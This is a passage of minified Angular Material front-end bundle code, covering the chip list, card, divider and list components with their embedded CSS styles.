required(e){this._required=wi(e),this.stateChanges.next()}get placeholder(){return this._chipInput?this._chipInput.placeholder:this._placeholder}set placeholder(e){this._placeholder=e,this.stateChanges.next()}get focused(){return this._chipInput&&this._chipInput.focused||this._hasFocusedChip()}get empty(){return(!this._chipInput||this._chipInput.empty)&&(!this.chips||0===this.chips.length)}get shouldLabelFloat(){return!this.empty||this.focused}get disabled(){return this.ngControl?!!this.ngControl.disabled:this._disabled}set disabled(e){this._disabled=wi(e),this._syncChipsState()}get selectable(){return this._selectable}set selectable(e){this._selectable=wi(e),this._syncChipsState()}set tabIndex(e){this._userTabIndex=e,this._tabIndex=e}get chipSelectionChanges(){return ra(...this.chips.map(e=>e.selectionChange))}get chipFocusChanges(){return ra(...this.chips.map(e=>e._onFocus))}get chipBlurChanges(){return ra(...this.chips.map(e=>e._onBlur))}get chipRemoveChanges(){return ra(...this.chips.map(e=>e.destroyed))}ngAfterContentInit(){this._keyManager=new L1(this.chips).withWrap().withVerticalOrientation().withHomeAndEnd().withHorizontalOrientation(this._dir?this._dir.value:"ltr"),this._dir&&this._dir.change.pipe(ea(this._destroyed)).subscribe(e=>this._keyManager.withHorizontalOrientation(e)),this._keyManager.tabOut.pipe(ea(this._destroyed)).subscribe(()=>{this._allowFocusEscape()}),this.chips.changes.pipe(Ro(null),ea(this._destroyed)).subscribe(()=>{(this.disabled||!this.selectable)&&Promise.resolve().then(()=>{this._syncChipsState()}),this._resetChips(),this._initializeSelection(),this._updateTabIndex(),this._updateFocusForDestroyedChips(),this.stateChanges.next()})}ngOnInit(){this._selectionModel=new I1(this.multiple,void 0,!1),this.stateChanges.next()}ngDoCheck(){this.ngControl&&(this.updateErrorState(),this.ngControl.disabled!==this._disabled&&(this.disabled=!!this.ngControl.disabled))}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete(),this.stateChanges.complete(),this._dropSubscriptions()}registerInput(e){this._chipInput=e,this._elementRef.nativeElement.setAttribute("data-mat-chip-input",e.id)}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}writeValue(e){this.chips&&this._setSelectionByValue(e,!1)}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this.stateChanges.next()}onContainerClick(e){this._originatesFromChip(e)||this.focus()}focus(e){this.disabled||this._chipInput&&this._chipInput.focused||(this.chips.length>0?(this._keyManager.setFirstItemActive(),this.stateChanges.next()):(this._focusInput(e),this.stateChanges.next()))}_focusInput(e){this._chipInput&&this._chipInput.focus(e)}_keydown(e){const i=e.target;i&&i.classList.contains("mat-chip")&&(this._keyManager.onKeydown(e),this.stateChanges.next())}_updateTabIndex(){this._tabIndex=this._userTabIndex||(0===this.chips.length?-1:0)}_updateFocusForDestroyedChips(){if(null!=this._lastDestroyedChipIndex)if(this.chips.length){const e=Math.min(this._lastDestroyedChipIndex,this.chips.length-1);this._keyManager.setActiveItem(e)}else this.focus();this._lastDestroyedChipIndex=null}_isValidIndex(e){return e>=0&&e<this.chips.length}_setSelectionByValue(e,i=!0){if(this._clearSelection(),this.chips.forEach(n=>n.deselect()),Array.isArray(e))e.forEach(n=>this._selectValue(n,i)),this._sortValues();else{const n=this._selectValue(e,i);n&&i&&this._keyManager.setActiveItem(n)}}_selectValue(e,i=!0){const n=this.chips.find(r=>null!=r.value&&this._compareWith(r.value,e));return n&&(i?n.selectViaInteraction():n.select(),this._selectionModel.select(n)),n}_initializeSelection(){Promise.resolve().then(()=>{(this.ngControl||this._value)&&(this._setSelectionByValue(this.ngControl?this.ngControl.value:this._value,!1),this.stateChanges.next())})}_clearSelection(e){this._selectionModel.clear(),this.chips.forEach(i=>{i!==e&&i.deselect()}),this.stateChanges.next()}_sortValues(){this._multiple&&(this._selectionModel.clear(),this.chips.forEach(e=>{e.selected&&this._selectionModel.select(e)}),this.stateChanges.next())}_propagateChanges(e){let i=null;i=Array.isArray(this.selected)?this.selected.map(n=>n.value):this.selected?this.selected.value:e,this._value=i,this.change.emit(new j0e(this,i)),this.valueChange.emit(i),this._onChange(i),this._changeDetectorRef.markForCheck()}_blur(){this._hasFocusedChip()||this._keyManager.setActiveItem(-1),this.disabled||(this._chipInput?setTimeout(()=>{this.focused||this._markAsTouched()}):this._markAsTouched())}_markAsTouched(){this._onTouched(),this._changeDetectorRef.markForCheck(),this.stateChanges.next()}_allowFocusEscape(){-1!==this._tabIndex&&(this._tabIndex=-1,setTimeout(()=>{this._tabIndex=this._userTabIndex||0,this._changeDetectorRef.markForCheck()}))}_resetChips(){this._dropSubscriptions(),this._listenToChipsFocus(),this._listenToChipsSelection(),this._listenToChipsRemoved()}_dropSubscriptions(){this._chipFocusSubscription&&(this._chipFocusSubscription.unsubscribe(),this._chipFocusSubscription=null),this._chipBlurSubscription&&(this._chipBlurSubscription.unsubscribe(),this._chipBlurSubscription=null),this._chipSelectionSubscription&&(this._chipSelectionSubscription.unsubscribe(),this._chipSelectionSubscription=null),this._chipRemoveSubscription&&(this._chipRemoveSubscription.unsubscribe(),this._chipRemoveSubscription=null)}_listenToChipsSelection(){this._chipSelectionSubscription=this.chipSelectionChanges.subscribe(e=>{e.source.selected?this._selectionModel.select(e.source):this._selectionModel.deselect(e.source),this.multiple||this.chips.forEach(i=>{!this._selectionModel.isSelected(i)&&i.selected&&i.deselect()}),e.isUserInput&&this._propagateChanges()})}_listenToChipsFocus(){this._chipFocusSubscription=this.chipFocusChanges.subscribe(e=>{let i=this.chips.toArray().indexOf(e.chip);this._isValidIndex(i)&&this._keyManager.updateActiveItem(i),this.stateChanges.next()}),this._chipBlurSubscription=this.chipBlurChanges.subscribe(()=>{this._blur(),this.stateChanges.next()})}_listenToChipsRemoved(){this._chipRemoveSubscription=this.chipRemoveChanges.subscribe(e=>{const i=e.chip,n=this.chips.toArray().indexOf(e.chip);this._isValidIndex(n)&&i._hasFocus&&(this._lastDestroyedChipIndex=n)})}_originatesFromChip(e){let i=e.target;for(;i&&i!==this._elementRef.nativeElement;){if(i.classList.contains("mat-chip"))return!0;i=i.parentElement}return!1}_hasFocusedChip(){return this.chips&&this.chips.some(e=>e._hasFocus)}_syncChipsState(){this.chips&&this.chips.forEach(e=>{e._chipListDisabled=this._disabled,e._chipListMultiple=this.multiple,e.chipListSelectable=this._selectable})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(Cr,8),Ee(y1,8),Ee(dg,8),Ee(up),Ee(fm,10))},t.\u0275cmp=Wt({type:t,selectors:[["mat-chip-list"]],contentQueries:function(e,i,n){if(1&e&&ha(n,db,5),2&e){let r;Vt(r=Bt())&&(i.chips=r)}},hostAttrs:[1,"mat-chip-list"],hostVars:14,hostBindings:function(e,i){1&e&&he("focus",function(){return i.focus()})("blur",function(){return i._blur()})("keydown",function(r){return i._keydown(r)}),2&e&&(Gs("id",i._uid),Rt("tabindex",i.disabled?null:i._tabIndex)("aria-required",i.role?i.required:null)("aria-disabled",i.disabled.toString())("aria-invalid",i.errorState)("aria-multiselectable",i.multiple)("role",i.role)("aria-orientation",i.ariaOrientation),Ct("mat-chip-list-disabled",i.disabled)("mat-chip-list-invalid",i.errorState)("mat-chip-list-required",i.required))},inputs:{role:"role",userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],errorStateMatcher:"errorStateMatcher",multiple:"multiple",compareWith:"compareWith",value:"value",required:"required",placeholder:"placeholder",disabled:"disabled",ariaOrientation:["aria-orientation","ariaOrientation"],selectable:"selectable",tabIndex:"tabIndex"},outputs:{change:"change",valueChange:"valueChange"},exportAs:["matChipList"],features:[ki([{provide:sb,useExisting:t}]),ci],ngContentSelectors:W0e,decls:2,vars:0,consts:[[1,"mat-chip-list-wrapper"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0),va(1),u())},styles:['.mat-chip{position:relative;box-sizing:border-box;-webkit-tap-highlight-color:rgba(0,0,0,0);border:none;-webkit-appearance:none;-moz-appearance:none}.mat-chip::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-standard-chip{transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);display:inline-flex;padding:7px 12px;border-radius:16px;align-items:center;cursor:default;min-height:32px;height:1px}.mat-standard-chip._mat-animation-noopable{transition:none !important;animation:none !important}.mat-standard-chip .mat-chip-remove{border:none;-webkit-appearance:none;-moz-appearance:none;padding:0;background:none}.mat-standard-chip .mat-chip-remove.mat-icon,.mat-standard-chip .mat-chip-remove .mat-icon{width:18px;height:18px;font-size:18px}.mat-standard-chip::after{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:inherit;opacity:0;content:"";pointer-events:none;transition:opacity 200ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-standard-chip:hover::after{opacity:.12}.mat-standard-chip:focus{outline:none}.mat-standard-chip:focus::after{opacity:.16}.cdk-high-contrast-active .mat-standard-chip{outline:solid 1px}.cdk-high-contrast-active .mat-standard-chip.mat-chip-selected{outline-width:3px}.mat-standard-chip.mat-chip-disabled::after{opacity:0}.mat-standard-chip.mat-chip-disabled .mat-chip-remove,.mat-standard-chip.mat-chip-disabled .mat-chip-trailing-icon{cursor:default}.mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar,.mat-standard-chip.mat-chip-with-avatar{padding-top:0;padding-bottom:0}.mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar{padding-right:8px;padding-left:0}[dir=rtl] .mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar{padding-left:8px;padding-right:0}.mat-standard-chip.mat-chip-with-trailing-icon{padding-top:7px;padding-bottom:7px;padding-right:8px;padding-left:12px}[dir=rtl] .mat-standard-chip.mat-chip-with-trailing-icon{padding-left:8px;padding-right:12px}.mat-standard-chip.mat-chip-with-avatar{padding-left:0;padding-right:12px}[dir=rtl] .mat-standard-chip.mat-chip-with-avatar{padding-right:0;padding-left:12px}.mat-standard-chip .mat-chip-avatar{width:24px;height:24px;margin-right:8px;margin-left:4px}[dir=rtl] .mat-standard-chip .mat-chip-avatar{margin-left:8px;margin-right:4px}.mat-standard-chip .mat-chip-remove,.mat-standard-chip .mat-chip-trailing-icon{width:18px;height:18px;cursor:pointer}.mat-standard-chip .mat-chip-remove,.mat-standard-chip .mat-chip-trailing-icon{margin-left:8px;margin-right:0}[dir=rtl] .mat-standard-chip .mat-chip-remove,[dir=rtl] .mat-standard-chip .mat-chip-trailing-icon{margin-right:8px;margin-left:0}.mat-chip-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none;border-radius:inherit;overflow:hidden;transform:translateZ(0)}.mat-chip-list-wrapper{display:flex;flex-direction:row;flex-wrap:wrap;align-items:center;margin:-4px}.mat-chip-list-wrapper input.mat-input-element,.mat-chip-list-wrapper .mat-standard-chip{margin:4px}.mat-chip-list-stacked .mat-chip-list-wrapper{flex-direction:column;align-items:flex-start}.mat-chip-list-stacked .mat-chip-list-wrapper .mat-standard-chip{width:100%}.mat-chip-avatar{border-radius:50%;justify-content:center;align-items:center;display:flex;overflow:hidden;object-fit:cover}input.mat-chip-input{width:150px;margin:4px;flex:1 0 150px}'],encapsulation:2,changeDetection:0}),t})(),BF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[up,{provide:FF,useValue:{separatorKeyCodes:[13]}}],imports:[la]}),t})();const Q0e=["*",[["mat-card-footer"]]],$0e=["*","mat-card-footer"];let HF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-content"],["","mat-card-content",""],["","matCardContent",""]],hostAttrs:[1,"mat-card-content"]}),t})(),UF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-title"],["","mat-card-title",""],["","matCardTitle",""]],hostAttrs:[1,"mat-card-title"]}),t})(),K0e=(()=>{class t{constructor(){this.align="start"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-actions"]],hostAttrs:[1,"mat-card-actions"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-card-actions-align-end","end"===i.align)},inputs:{align:"align"},exportAs:["matCardActions"]}),t})(),qF=(()=>{class t{constructor(e){this._animationMode=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-card"]],hostAttrs:[1,"mat-card","mat-focus-indicator"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)},exportAs:["matCard"],ngContentSelectors:$0e,decls:2,vars:0,template:function(e,i){1&e&&(Jn(Q0e),va(0),va(1,1))},styles:[".mat-card{transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);display:block;position:relative;padding:16px;border-radius:4px}.mat-card._mat-animation-noopable{transition:none !important;animation:none !important}.mat-card>.mat-divider-horizontal{position:absolute;left:0;width:100%}[dir=rtl] .mat-card>.mat-divider-horizontal{left:auto;right:0}.mat-card>.mat-divider-horizontal.mat-divider-inset{position:static;margin:0}[dir=rtl] .mat-card>.mat-divider-horizontal.mat-divider-inset{margin-right:0}.cdk-high-contrast-active .mat-card{outline:solid 1px}.mat-card-actions,.mat-card-subtitle,.mat-card-content{display:block;margin-bottom:16px}.mat-card-title{display:block;margin-bottom:8px}.mat-card-actions{margin-left:-8px;margin-right:-8px;padding:8px 0}.mat-card-actions-align-end{display:flex;justify-content:flex-end}.mat-card-image{width:calc(100% + 32px);margin:0 -16px 16px -16px;display:block;overflow:hidden}.mat-card-image img{width:100%}.mat-card-footer{display:block;margin:0 -16px -16px -16px}.mat-card-actions .mat-button,.mat-card-actions .mat-raised-button,.mat-card-actions .mat-stroked-button{margin:0 8px}.mat-card-header{display:flex;flex-direction:row}.mat-card-header .mat-card-title{margin-bottom:12px}.mat-card-header-text{margin:0 16px}.mat-card-avatar{height:40px;width:40px;border-radius:50%;flex-shrink:0;object-fit:cover}.mat-card-title-group{display:flex;justify-content:space-between}.mat-card-sm-image{width:80px;height:80px}.mat-card-md-image{width:112px;height:112px}.mat-card-lg-image{width:152px;height:152px}.mat-card-xl-image{width:240px;height:240px;margin:-8px}.mat-card-title-group>.mat-card-xl-image{margin:-8px 0 8px}@media(max-width: 599px){.mat-card-title-group{margin:0}.mat-card-xl-image{margin-left:0;margin-right:0}}.mat-card>:first-child,.mat-card-content>:first-child{margin-top:0}.mat-card>:last-child:not(.mat-card-footer),.mat-card-content>:last-child:not(.mat-card-footer){margin-bottom:0}.mat-card-image:first-child{margin-top:-16px;border-top-left-radius:inherit;border-top-right-radius:inherit}.mat-card>.mat-card-actions:last-child{margin-bottom:-8px;padding-bottom:0}.mat-card-actions:not(.mat-card-actions-align-end) .mat-button:first-child,.mat-card-actions:not(.mat-card-actions-align-end) .mat-raised-button:first-child,.mat-card-actions:not(.mat-card-actions-align-end) .mat-stroked-button:first-child{margin-left:0;margin-right:0}.mat-card-actions-align-end .mat-button:last-child,.mat-card-actions-align-end .mat-raised-button:last-child,.mat-card-actions-align-end .mat-stroked-button:last-child{margin-left:0;margin-right:0}.mat-card-title:not(:first-child),.mat-card-subtitle:not(:first-child){margin-top:-4px}.mat-card-header .mat-card-subtitle:not(:first-child){margin-top:-8px}.mat-card>.mat-card-xl-image:first-child{margin-top:-8px}.mat-card>.mat-card-xl-image:last-child{margin-bottom:-8px}"],encapsulation:2,changeDetection:0}),t})(),aA=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),_p=(()=>{class t{constructor(){this._vertical=!1,this._inset=!1}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get inset(){return this._inset}set inset(e){this._inset=wi(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["mat-divider"]],hostAttrs:["role","separator",1,"mat-divider"],hostVars:7,hostBindings:function(e,i){2&e&&(Rt("aria-orientation",i.vertical?"vertical":"horizontal"),Ct("mat-divider-vertical",i.vertical)("mat-divider-horizontal",!i.vertical)("mat-divider-inset",i.inset))},inputs:{vertical:"vertical",inset:"inset"},decls:0,vars:0,template:function(e,i){},styles:[".mat-divider{display:block;margin:0;border-top-width:1px;border-top-style:solid}.mat-divider.mat-divider-vertical{border-top:0;border-right-width:1px;border-right-style:solid}.mat-divider.mat-divider-inset{margin-left:80px}[dir=rtl] .mat-divider.mat-divider-inset{margin-left:auto;margin-right:80px}"],encapsulation:2,changeDetection:0}),t})(),u8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();const GF=["*"],X0e=[[["","mat-list-avatar",""],["","mat-list-icon",""],["","matListAvatar",""],["","matListIcon",""]],[["","mat-line",""],["","matLine",""]],"*"],Y0e=["[mat-list-avatar], [mat-list-icon], [matListAvatar], [matListIcon]","[mat-line], [matLine]","*"],i1e=Jc(Dl(class{})),a1e=Dl(class{}),QF=new ni("MatList"),n1e=new ni("MatNavList");let es=(()=>{class t extends i1e{constructor(e){super(),this._elementRef=e,this._stateChanges=new J,"action-list"===this._getListType()&&(e.nativeElement.classList.add("mat-action-list"),e.nativeElement.setAttribute("role","group"))}_getListType(){const e=this._elementRef.nativeElement.nodeName.toLowerCase();return"mat-list"===e?"list":"mat-action-list"===e?"action-list":null}ngOnChanges(){this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-list"],["mat-action-list"]],hostAttrs:[1,"mat-list","mat-list-base"],inputs:{disableRipple:"disableRipple",disabled:"disabled"},exportAs:["matList"],features:[ki([{provide:QF,useExisting:t}]),ci,sa],ngContentSelectors:GF,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},styles:['.mat-subheader{display:flex;box-sizing:border-box;padding:16px;align-items:center}.mat-list-base .mat-subheader{margin:0}button.mat-list-item,button.mat-list-option{padding:0;width:100%;background:none;color:inherit;border:none;outline:inherit;-webkit-tap-highlight-color:rgba(0,0,0,0);text-align:left}[dir=rtl] button.mat-list-item,[dir=rtl] button.mat-list-option{text-align:right}button.mat-list-item::-moz-focus-inner,button.mat-list-option::-moz-focus-inner{border:0}.mat-list-base{padding-top:8px;display:block;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-list-base .mat-subheader{height:48px;line-height:16px}.mat-list-base .mat-subheader:first-child{margin-top:-8px}.mat-list-base .mat-list-item,.mat-list-base .mat-list-option{display:block;height:48px;-webkit-tap-highlight-color:rgba(0,0,0,0);width:100%;padding:0}.mat-list-base .mat-list-item .mat-list-item-content,.mat-list-base .mat-list-option .mat-list-item-content{display:flex;flex-direction:row;align-items:center;box-sizing:border-box;padding:0 16px;position:relative;height:inherit}.mat-list-base .mat-list-item .mat-list-item-content-reverse,.mat-list-base .mat-list-option .mat-list-item-content-reverse{display:flex;align-items:center;padding:0 16px;flex-direction:row-reverse;justify-content:space-around}.mat-list-base .mat-list-item .mat-list-item-ripple,.mat-list-base .mat-list-option .mat-list-item-ripple{display:block;top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-list-base .mat-list-item.mat-list-item-with-avatar,.mat-list-base .mat-list-option.mat-list-item-with-avatar{height:56px}.mat-list-base .mat-list-item.mat-2-line,.mat-list-base .mat-list-option.mat-2-line{height:72px}.mat-list-base .mat-list-item.mat-3-line,.mat-list-base .mat-list-option.mat-3-line{height:88px}.mat-list-base .mat-list-item.mat-multi-line,.mat-list-base .mat-list-option.mat-multi-line{height:auto}.mat-list-base .mat-list-item.mat-multi-line .mat-list-item-content,.mat-list-base .mat-list-option.mat-multi-line .mat-list-item-content{padding-top:16px;padding-bottom:16px}.mat-list-base .mat-list-item .mat-list-text,.mat-list-base .mat-list-option .mat-list-text{display:flex;flex-direction:column;flex:auto;box-sizing:border-box;overflow:hidden;padding:0}.mat-list-base .mat-list-item .mat-list-text>*,.mat-list-base .mat-list-option .mat-list-text>*{margin:0;padding:0;font-weight:normal;font-size:inherit}.mat-list-base .mat-list-item .mat-list-text:empty,.mat-list-base .mat-list-option .mat-list-text:empty{display:none}.mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:0;padding-left:16px}[dir=rtl] .mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:0}.mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-left:0;padding-right:16px}[dir=rtl] .mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-right:0;padding-left:16px}.mat-list-base .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:16px}.mat-list-base .mat-list-item .mat-list-avatar,.mat-list-base .mat-list-option .mat-list-avatar{flex-shrink:0;width:40px;height:40px;border-radius:50%;object-fit:cover}.mat-list-base .mat-list-item .mat-list-avatar~.mat-divider-inset,.mat-list-base .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:72px;width:calc(100% - 72px)}[dir=rtl] .mat-list-base .mat-list-item .mat-list-avatar~.mat-divider-inset,[dir=rtl] .mat-list-base .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:auto;margin-right:72px}.mat-list-base .mat-list-item .mat-list-icon,.mat-list-base .mat-list-option .mat-list-icon{flex-shrink:0;width:24px;height:24px;font-size:24px;box-sizing:content-box;border-radius:50%;padding:4px}.mat-list-base .mat-list-item .mat-list-icon~.mat-divider-inset,.mat-list-base .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:64px;width:calc(100% - 64px)}[dir=rtl] .mat-list-base .mat-list-item .mat-list-icon~.mat-divider-inset,[dir=rtl] .mat-list-base .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:auto;margin-right:64px}.mat-list-base .mat-list-item .mat-divider,.mat-list-base .mat-list-option .mat-divider{position:absolute;bottom:0;left:0;width:100%;margin:0}[dir=rtl] .mat-list-base .mat-list-item .mat-divider,[dir=rtl] .mat-list-base .mat-list-option .mat-divider{margin-left:auto;margin-right:0}.mat-list-base .mat-list-item .mat-divider.mat-divider-inset,.mat-list-base .mat-list-option .mat-divider.mat-divider-inset{position:absolute}.mat-list-base[dense]{padding-top:4px;display:block}.mat-list-base[dense] .mat-subheader{height:40px;line-height:8px}.mat-list-base[dense] .mat-subheader:first-child{margin-top:-4px}.mat-list-base[dense] .mat-list-item,.mat-list-base[dense] .mat-list-option{display:block;height:40px;-webkit-tap-highlight-color:rgba(0,0,0,0);width:100%;padding:0}.mat-list-base[dense] .mat-list-item .mat-list-item-content,.mat-list-base[dense] .mat-list-option .mat-list-item-content{display:flex;flex-direction:row;align-items:center;box-sizing:border-box;padding:0 16px;position:relative;height:inherit}.mat-list-base[dense] .mat-list-item .mat-list-item-content-reverse,.mat-list-base[dense] .mat-list-option .mat-list-item-content-reverse{display:flex;align-items:center;padding:0 16px;flex-direction:row-reverse;justify-content:space-around}.mat-list-base[dense] .mat-list-item .mat-list-item-ripple,.mat-list-base[dense] .mat-list-option .mat-list-item-ripple{display:block;top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar{height:48px}.mat-list-base[dense] .mat-list-item.mat-2-line,.mat-list-base[dense] .mat-list-option.mat-2-line{height:60px}.mat-list-base[dense] .mat-list-item.mat-3-line,.mat-list-base[dense] .mat-list-option.mat-3-line{height:76px}.mat-list-base[dense] .mat-list-item.mat-multi-line,.mat-list-base[dense] .mat-list-option.mat-multi-line{height:auto}.mat-list-base[dense] .mat-list-item.mat-multi-line .mat-list-item-content,.mat-list-base[dense] .mat-list-option.mat-multi-line .mat-list-item-content{padding-top:16px;padding-bottom:16px}.mat-list-base[dense] .mat-list-item .mat-list-text,.mat-list-base[dense] .mat-list-option .mat-list-text{display:flex;flex-direction:column;flex:auto;box-sizing:border-box;overflow:hidden;padding:0}.mat-list-base[dense] .mat-list-item .mat-list-text>*,.mat-list-base[dense] .mat-list-option .mat-list-text>*{margin:0;padding:0;font-weight:normal;font-size:inherit}.mat-list-base[dense] .mat-list-item .mat-list-text:empty,.mat-list-base[dense] .mat-list-option .mat-list-text:empty{display:none}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:0;padding-left:16px}[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:0}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-left:0;padding-right:16px}[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-right:0;padding-left:16px}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:16px}.mat-list-base[dense] .mat-list-item .mat-list-avatar,.mat-list-base[dense] .mat-list-option .mat-list-avatar{flex-shrink:0;width:36px;height:36px;border-radius:50%;object-fit:cover}.mat-list-base[dense] .mat-list-item .mat-list-avatar~.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:68px;width:calc(100% - 68px)}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-list-avatar~.mat-divider-inset,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:auto;margin-right:68px}.mat-list-base[dense] .mat-list-item .mat-list-icon,.mat-list-base[dense] .mat-list-option .mat-list-icon{flex-shrink:0;width:20px;height:20px;font-size:20px;box-sizing:content-box;border-radius:50%;padding:4px}.mat-list-base[dense] .mat-list-item .mat-list-icon~.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:60px;width:calc(100% - 60px)}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-list-icon~.mat-divider-inset,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:auto;margin-right:60px}.mat-list-base[dense] .mat-list-item .mat-divider,.mat-list-base[dense] .mat-list-option .mat-divider{position:absolute;bottom:0;left:0;width:100%;margin:0}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-divider,[dir=rtl] .mat-list-base[dense] 